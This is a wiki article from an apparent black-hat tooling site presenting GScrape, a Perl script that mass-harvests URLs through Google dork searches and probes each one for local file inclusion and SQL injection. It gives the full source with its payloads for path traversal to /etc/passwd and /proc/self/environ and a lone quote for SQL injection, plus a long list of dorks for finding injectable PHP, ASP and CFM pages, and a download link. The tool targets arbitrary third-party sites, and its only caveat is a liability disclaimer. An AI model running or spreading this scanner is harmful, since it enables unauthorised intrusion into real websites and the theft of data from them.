GScrape

GScrape is a small Perl script that uses Google's AJAX Search API, via the Google::Search module (http://search.cpan.org/~rokr/Google-Search-0.027/lib/Google/Search.pm), to find vulnerable websites.

Special thanks to Trep for his contributions to this article.

Introduction

Main article: Web exploitation tools

The purpose of this script is to demonstrate that one can easily create simple tools to automate tedious tasks. This script requires the Google::Search Perl module.

  • You can install Google::Search using CPAN:
Terminal

localhost:~ $ cpan -i Google::Search
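
Under the hood, GScrape needs only two calls from this module: Google::Search->Web to start a query and next to walk the results (the same calls used in the source listing below). A minimal standalone sketch, using one of the search terms from the list further down:

 #!/usr/bin/perl
 # Minimal Google::Search sketch -- mirrors the calls GScrape makes in its source.
 use Google::Search;

 my $search = Google::Search->Web( query => 'inurl:index.php?page=' );
 while ( my $result = $search->next ) {
     print $result->uri, "\n";   # print the URI of each search result
 }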

Example

GScrape is a simple tool: it reads a file, specified by the user, containing a list of search terms, queries Google with those terms, and retrieves an array of result URLs. Each result is then tested for local file inclusion (LFI) and SQL injection vulnerabilities; any findings are logged to the output file specified by the user.

 perl gscrape.pl -f dork.lst -o gscrape.log
Note: GScrape will not return any results unless your input file actually contains a list of search terms.
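
For example, a minimal input file (dork.lst in the invocation above) could hold a handful of terms from the Search Terms section below, one per line:

 inurl:index.php?page=
 index.php?id=
 trainers.php?id=

Hits are appended to the output file by the print FILE calls in the source, as [LFI VULN] >> or [SQLI VULN] >> lines followed by the URL and payload that triggered the detection.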

Source

 
#!/usr/bin/perl
 
# gscrape.pl
#
# Uses Google::Search to iterate through a list of dorks (e.g. dorks.lst)
# and then prints out a list of vulnerable sites.
 
use Term::ANSIColor;
use Getopt::Std;
use HTTP::Request;
use Google::Search;
use LWP::UserAgent;
 
#vars n stuff
my $search;                             #single search term (used only by the single-search branch)
my $useragent = LWP::UserAgent->new();  #HTTP client used to test each result
my $infile;                             #input file containing the search terms
my $outfile;                            #output log file
my $searchmode;                         #set to "list" when -f is supplied
my %opt;                                #parsed command-line options (filled in by getOpts)
my @url_list;                           #search results returned by Google
my @search_terms;                       #search terms and
my @dorks;                              #dorks, to check if the terms have "inurl:".
my @vulnsites;                          #vulnerable sites (currently unused)
 
 
 
##--main execution:
		&banner();
		&getOpts();
 
 
		if ( ($opt{s} || $opt{f}) && $opt{o} && !$opt{h} ) { #parenthesised: && binds tighter than ||
		&printInfo("Trying with the following settings:");
		&printInfo( ">>Search Mode: $searchmode");
		&printInfo( ">>Output file: $outfile");
 
	if ($searchmode eq "single"){ #string comparison (eq), not numeric (==)

		&printInfo( ">>Search Term: $search");
		&search_single(); #single-term mode; no search_single() sub exists in this listing
		} else {
			 &printInfo( ">>Search List: $infile");
			 &search_list(); 
			 }
 
 
		 }
		 if (!$opt{h} && !$opt{o}){
             &printCritical("YOU MUST SPECIFY AN OUTPUT FILE!1!one!");
             &printInfo("use -h flag for help");
			 print"\n\r\nExiting..\n";
		 }
 
 
 
 
 
 
##--subroutines:.
 
 
 
#Search using a list of terms:
sub search_list(){
 
open FILE, "<", $infile or die $!;
my @search_terms = <FILE>;
close FILE;
chomp(@search_terms); #strip the trailing newline from each term
my $num = @search_terms;
&printInfo("Loaded $num search terms.");
&printInfo("Fixing improper search terms [if any]");
#iterate through the search terms, checking if they have "inurl:" if not, prepend it.
for( my $int = 0; $int < $num; $int++){
	#use the loop index directly; a random index would repeat some terms and skip others
	if ( $search_terms[$int] !~ /inurl:/ ){
		push(@dorks, "inurl:".$search_terms[$int]);
		}
	else {
		push(@dorks, $search_terms[$int]);
		}

	}
	print"\n";
&printInfo("Retrieving search results..");
 
#iterate through the google dorks (search terms, with 'inurl:'), and add them to the list of sites.
foreach(@dorks) { 
 
	 $search = Google::Search->Web( query => $_ );
	while ( my $result = $search->next ) {
		if( $result->uri =~ /\=/) { #check if results have "=" in them (ex: www.site.com/index.php?page=LOLCATS)
			push(@url_list, $result->uri); #push result into the array
			&printInfo(">>".$result->uri);
		}
	}
}
 
#payloads appended to each URL: LFI probes plus a lone single quote for SQL injection
my @lfitest = (
    '/etc/passwd%00',
	'/etc/passwd',
	'/proc/self/environ%00',
	'/proc/self/environ',
	'../../../../../../../../../../../../../../../proc/self/environ',
	'../../../../../../../../../../../../../../../proc/self/environ%00',
    '../../../../../../../../../../../../../../../etc/passwd',
    '../../../../../../../../../../../../../../../etc/passwd%00',
    "'"
    );
 
 
my $lfinum = @lfitest;
 
print"\n";
&printInfo("Testing sites for vulnerabilities..");
 
 
 
#Test the sites for vulns.
 
foreach my $url ( @url_list ){
		my $x = $url;       #work on a copy of the current result URL
		$x =~ s/=.*/=/ ;    #strip the parameter value, leaving e.g. "index.php?page="



		for (my $i = 0; $i < $lfinum; $i++){
			if ( $x !~ /http:\/\// ){ #make sure the URL has a scheme
				$x = "http://".$x;
			}
 
 
 
        my $response = $useragent->get($x.$lfitest[$i]); #fetch the URL with the payload appended
        my $result = $response->content;

        if ($result =~ m/root:x:/i || $result =~ m/HTTP_USER_AGENT/){ #passwd or environ contents => LFI
			&printVulnLFI(">>> ".$x.$lfitest[$i]);
			open FILE, ">>", $outfile or die $!;
			print FILE "[LFI VULN] >> ".$x.$lfitest[$i]."\n";
			close FILE;
			last;
		}
		if ($result =~ m/error in your/i || $result =~ m/syntax/i){ #SQL error text => injectable
			&printVulnSQLI(">>> ".$x.$lfitest[$i]);
			open FILE, ">>", $outfile or die $!;
			print FILE "[SQLI VULN] >> ".$x.$lfitest[$i]."\n";
			close FILE;
			last;
		}
		if ($result =~ m/hacking/i || $result =~ m/reported/i || $result =~ m/recorded/i || $result =~ m/malicious/i){ #common IDS block-page keywords
			&printCritical("> Whoops! Tripped an IDS at: ".$x." With: ".$lfitest[$i]);
 
		}
 
	}
}
 
}
 
 
 
 
 
 
sub banner() {
system('clear');
    print("\r+=====================================================================+
           \r|                              GScrape                                |
           \r|         ________  _________                                         |
           \r|        /  _____/ /   _____/ ________________  ______   ____         |
           \r|       /   \\  ___ \\_____  \\_/ ___\\_  __ \\__  \\ \\____ \\_/ __ \\        |
           \r|       \\    \\_\\  \\/        \\  \\___|  | \\// __ \\|  |_> >  ___/        |
           \r|        \\______  /_______  /\\___  >__|  (____  /   __/ \\___  >       |
           \r|               \\/        \\/     \\/           \\/|__|        \\/        |
           \r|                                                                     |
           \r|                                                                     |
           \r|           Uses Google AJAX API to search for vulnerabilities        |
            \r+=====================================================================+
            \r                      
             \r                       www.BlackhatAcademy.net
           " );
 
           printWarning("THE END USER IS LIABLE FOR THE USE OF THIS SOFTWARE.
                         \rUSING THIS AGAINST ANY SYSTEM WITHOUT PERMISSION IS A CRIMINAL ACT
                         \rTHE AUTHOR TAKES NO RESPONSIBILITY FOR THE END-USER'S ACTIONS.\n");
 
 
 
}
 
 
sub getOpts(){
	#option modes, and args.
	my $opt_string = 'f:o:h';
        getopts( "$opt_string", \%opt );
 
        #set vars of $outfile, and $infile if they are defined.
 
 
		if ($opt{o}){
			$outfile = $opt{o};
		}
 
		if ($opt{f}){
 
			$infile = $opt{f};
			$searchmode = "list";
 
		}
 
 
 
        #Display help page if -h
        usage() if $opt{h};
 
 
 
}
#YES HELLO, THIS IS HELP PAGE.
sub usage(){
	print("
 
 
 GScrape Usage:
 
	Search using a list of search terms:
	 -f /path/to/dorks.txt
 
 
	Define output file:
	 -o results.out
 
 
 
 
Example Usages:
 
    Run a list of search terms through the scanner:
	 perl gscrape.pl -f ~/Dork.lst -o ~/result.out 
 
 
	");
}
 
 
	#HERE BE ANSICOLOR:
	# [INFO] [CRITICAL] and [WARNING] messages
 
	sub printCritical(){
		my $error = shift(@_);
 
 
     print color 'bold blue';
     print "\r[";
     print color 'red';
     print "CRITICAL";
     print color 'bold blue';
     print "]  "; 
     print color 'red';
     print color 'reset';
     print $error."\n";
 
	}
	sub printWarning(){
 
		my $error = shift(@_);
 
 
     print color 'bold blue';
     print "\r[";
     print color 'yellow';
     print "WARNING";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $error."\n";
 
	}
	sub printInfo(){
 
		my $info = shift(@_);
 
 
     print color 'bold blue';
 
     print "\r[";
     print color 'reset';
     print "INFO";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $info."\n";
 
	}
 
		sub printVulnLFI(){
 
		my $info = shift(@_);
 
 
     print color 'bold blue';
 
     print "\r[";
     print color 'green';
     print "LFI VULN ";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $info."\n";
 
	}
 
			sub printVulnSQLI(){
 
		my $info = shift(@_);
 
 
     print color 'bold blue';
 
     print "\r[";
     print color 'green';
     print "SQLI VULN";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $info."\n";
 
	}
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Search Terms

These are just some examples of general search terms. They are not guaranteed to find any vulnerabilities, but they probably will. With that said, you are responsible for what you do with anything you find using this tool.

Please note that the search terms in your file DO NOT require "inurl:"; GScrape adds it for you if it isn't there.
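The relevant check, condensed from search_list() in the source above:

 if ( $search_terms[$int] !~ /inurl:/ ){
     push(@dorks, "inurl:".$search_terms[$int]);   # prepend inurl: when it is missing
 } else {
     push(@dorks, $search_terms[$int]);            # the term is already a proper dork
 }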
  • .php?*=
  • inurl:index.php?page=
  • inurl:include.php?*=
  • index.php?include=
  • inurl:index.php?nic=
  • inurl:index.php?sec=
  • inurl:index.php?content=
  • inurl:index.php?link=
  • inurl:index.php?filename=
  • inurl:index.php?dir=
  • inurl:index.php?document=
  • inurl:index.php?view=
  • inurl:*.php?sel=
  • inurl:*.php?session=&content=
  • inurl:*.php?locate=
  • inurl:*.php?place=
  • inurl:*.php?layout=
  • inurl:*.php?go=
  • inurl:*.php?catch=
  • inurl:*.php?mode=
  • inurl:*.php?name=
  • inurl:*.php?loc=
  • inurl:*.php?f=
  • inurl:*.php?inf=
  • inurl:*.php?pg=
  • inurl:*.php?load=
  • inurl:*.php?naam=
  • cat.asp?cat=
  • Productlist.asp?Catalogid=
  • Category.asp?Category_Id=
  • Category.cfm?Category_Id=
  • category.asp?cid=
  • category.cfm?cid=
  • category.asp?cat=
  • category.cfm?cat=
  • category.asp?id=
  • index.cfm?Pageid=
  • category.asp?catid=
  • Category.asp?c=
  • Category.cfm?c=
  • Productlist.cfm?Catalogid=
  • Productlist.asp?Catalogid=
  • Viewitem.asp?Catalogid=
  • Viewitem.cfm?Catalogid=
  • catalog.cfm?Catalogid=
  • catalog.asp?Catalogid=
  • department.cfm?Dept=
  • department.asp?Dept=
  • Itemdetails.cfm?Catalogid=
  • Itemdetails.asp?Catalogid=
  • index.php?id=
  • trainers.php?id=
  • buy.php?category=
  • article.php?ID=
  • play_old.php?id=
  • declaration_more.php?decl_id=
  • Pageid=
  • games.php?id=
  • page.php?file=
  • newsDetail.php?id=
  • gallery.php?id=
  • article.php?id=
  • show.php?id=
  • staff_id=
  • newsitem.php?num=
  • readnews.php?id=
  • top10.php?cat=
  • historialeer.php?num=
  • reagir.php?num=


Download

  • Download URL: http://www.blackhatlibrary.net/releases/gscrape.tgz

We have more tools coming soon! Look forward to Chimera Live CD.

These are the offensive security tools developed by our wiki staff.


GScrape is part of a series on Web Exploitation.

Visit the Web Exploitation Portal for complete coverage.